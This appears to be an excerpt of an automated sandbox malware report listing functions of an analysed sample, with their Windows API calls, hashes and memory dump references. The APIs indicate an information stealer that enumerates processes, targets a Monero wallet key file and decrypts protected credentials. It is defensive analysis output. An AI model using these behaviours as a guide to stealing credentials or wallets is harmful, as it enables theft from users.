                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Ddoz$Hdoz$'+/$Ts}
                        • API String ID: 0-3368254143
                        • Opcode ID: d5b609fb3cf3bcf398781cd093dd550bdb89414af19ea41ab7b7f8284890dc34
                        • Instruction ID: c824fa5aeb119f6347a1dcfea8d6119d8ea0152259a1c56f6c8c93daee30f305
                        • Opcode Fuzzy Hash: d5b609fb3cf3bcf398781cd093dd550bdb89414af19ea41ab7b7f8284890dc34
                        • Instruction Fuzzy Hash: B0B216F3A0C2049FE3046E2DEC8567AFBE9EB94720F16493DEAC4C7744EA3558058697
                        Function 00E38680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00E405B7), ref: 00E386CA
                        • Process32First.KERNEL32(?,00000128), ref: 00E386DE
                        • Process32Next.KERNEL32(?,00000128), ref: 00E386F3
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        • CloseHandle.KERNEL32(?), ref: 00E38761
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: 509c9e9099747b4f38356ea24d0881d65c6458a96703365d86fb35b356ba03cc
                        • Instruction ID: 1f8b70e4795873e8f4932c1bb409f565ee7a464dfa2fd9149e1115084c93660b
                        • Opcode Fuzzy Hash: 509c9e9099747b4f38356ea24d0881d65c6458a96703365d86fb35b356ba03cc
                        • Instruction Fuzzy Hash: 41314F71901218EBCB24EF54DD49FEEBBB8EB45700F1051A9F10AB2190DB346A85CFA1
                        Function 00E38EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,00E25184,40000001,00000000,00000000,?,00E25184), ref: 00E38EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: 89580eafe3baf87ead70e819ee92ffbbe9b5f663b1da9dd02dac53efa634368b
                        • Instruction ID: f089222ea0ab115ab15049d2120b07c148394b845194ae4b63296757a15931ef
                        • Opcode Fuzzy Hash: 89580eafe3baf87ead70e819ee92ffbbe9b5f663b1da9dd02dac53efa634368b
                        • Instruction Fuzzy Hash: CF110674300308EFDB04DF64D988FAA3BA9AF89314F10A558F9199B250DB36ED41DB60
                        Function 00E37980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E40E00,00000000,?), ref: 00E379B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E379B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,00E40E00,00000000,?), ref: 00E379C4
                        • wsprintfA.USER32 ref: 00E379F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 21e8b25940d429a1e4106f88ac8ec49064db98179fd0a3905b6d86962571067d
                        • Instruction ID: a4379a3fb31e59c4f0fe0f2044f4986bbff758a5347fba97bdc9fd8597d3f413
                        • Opcode Fuzzy Hash: 21e8b25940d429a1e4106f88ac8ec49064db98179fd0a3905b6d86962571067d
                        • Instruction Fuzzy Hash: F31118B2A04118EACB249FC9D945BBEBBF8EB4CB11F10411AF645B2284D2395940C7B0
                        Function 00E37A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0196F6A8,00000000,?,00E40E10,00000000,?,00000000,00000000), ref: 00E37A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E37A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0196F6A8,00000000,?,00E40E10,00000000,?,00000000,00000000,?), ref: 00E37A7D
                        • wsprintfA.USER32 ref: 00E37AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: fe4dfed5bde3e9a99ae5280860017987d8c565b26cd6f6defd1cf850a1834c61
                        • Instruction ID: 8fe3723b80176e50bd1f3972b3febc44d4612ee0291fc98d2c9aba75d91fcf96
                        • Opcode Fuzzy Hash: fe4dfed5bde3e9a99ae5280860017987d8c565b26cd6f6defd1cf850a1834c61
                        • Instruction Fuzzy Hash: 9E115EB1A45218EFEB209B54DC49FA9BB78FB44721F10439AE91AA32C0D7795E40CF51
                        Function 011E85B7 Relevance: 5.4, Strings: 3, Instructions: 1644COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ]h6U$kHsv$=>
                        • API String ID: 0-1642610169
                        • Opcode ID: 82a951ead271a73c4ffd52a099c7542d253039d0ef12b24bdf7bfd72c26b4e7a
                        • Instruction ID: 540b3696e83c3640493a86e61a2cc8c4758bc6f357e13c327a79adcd9ca50e54
                        • Opcode Fuzzy Hash: 82a951ead271a73c4ffd52a099c7542d253039d0ef12b24bdf7bfd72c26b4e7a
                        • Instruction Fuzzy Hash: 05B23AF3A0C2149FE304AE2DEC8567ABBE9EF94320F1A453DEAC4D3744E93558048796
                        Function 00E33720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                        Download Yara Rule
                        APIs
                        • CoCreateInstance.COMBASE(00E3E118,00000000,00000001,00E3E108,00000000), ref: 00E33758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00E337B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: 279148a20ba6482877a80c1ba8a4f752a071697247bb026a959978daa7b10cd8
                        • Instruction ID: 70d5cf00fb46ae1164d8dc594b88dde3762b442106e8ca480421751b3463f2e4
                        • Opcode Fuzzy Hash: 279148a20ba6482877a80c1ba8a4f752a071697247bb026a959978daa7b10cd8
                        • Instruction Fuzzy Hash: DF41C770A40A289FDB24DB58CC99F9BB7B5BB48702F4051D8E609A72D0D7B16E85CF50
                        Function 00E29B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E29B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E29BA3
                        • LocalFree.KERNEL32(?), ref: 00E29BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: 21b718bb1b0a3e88768a6d24ba1b9a8fb8f2c6186d7b1c7c754be3a8e208df99
                        • Instruction ID: 5f1a616ebe3d2976bbe02b5bdaa4bbb894e090b1991866fdebf1c45fcc809b8e
                        • Opcode Fuzzy Hash: 21b718bb1b0a3e88768a6d24ba1b9a8fb8f2c6186d7b1c7c754be3a8e208df99
                        • Instruction Fuzzy Hash: CD11C9B8A00209EFDB04DF94D989AAE77B5FF88304F1045A8E915A7354D775AE10CFA1
                        Function 011E3526 Relevance: 4.1, Strings: 2, Instructions: 1615COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: w=~>$Y?
                        • API String ID: 0-4287603579
                        • Opcode ID: c435a45011fe910c3501e901720ef0df3ad52432f44c0804256353cb25b0e9b5
                        • Instruction ID: e3b2eb0322f817da9a188d81393b25d35a2d33bf2305176ec0ed32ec67fc63f1
                        • Opcode Fuzzy Hash: c435a45011fe910c3501e901720ef0df3ad52432f44c0804256353cb25b0e9b5
                        • Instruction Fuzzy Hash: 31B227F3A0C2049FE3046E2DEC8567AB7E9EF94320F1A493DEAC583744EA3559058797
                        Function 011F4BA2 Relevance: 3.5, Strings: 2, Instructions: 954COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: WW$e$h4\Y
                        • API String ID: 0-555393476
                        • Opcode ID: d880f014e81fb200375b142b76d014dac3f1b06a985fb9a15f5b59da80c43c53
                        • Instruction ID: b5b0b770d8a103892a95a6850bf0358a08edcae8da4006e9346511e5133e9e5e
                        • Opcode Fuzzy Hash: d880f014e81fb200375b142b76d014dac3f1b06a985fb9a15f5b59da80c43c53
                        • Instruction Fuzzy Hash: FF5229F3A0C6049FE304AE2DEC8573AFBEAEB94720F1A853DE6C4C3744E63558058656
                        Function 011E50BE Relevance: 2.8, Strings: 1, Instructions: 1587COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: cho.
                        • API String ID: 0-1889560526
                        • Opcode ID: 4f12aa712c04c94368c5fdbb5147fb511b0f51662af8d061c9e088ca0fb5f2ba
                        • Instruction ID: cbda1aef00a57c57b5ea3897ccb925623f8816659a78093845f6fa89adfeb578
                        • Opcode Fuzzy Hash: 4f12aa712c04c94368c5fdbb5147fb511b0f51662af8d061c9e088ca0fb5f2ba
                        • Instruction Fuzzy Hash: F8B2D3F3A0C2049FE3046F29EC8567AFBE9EF94720F1A492DEAC587340E67558418797
                        Function 011B0D60 Relevance: 1.5, Strings: 1, Instructions: 263COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
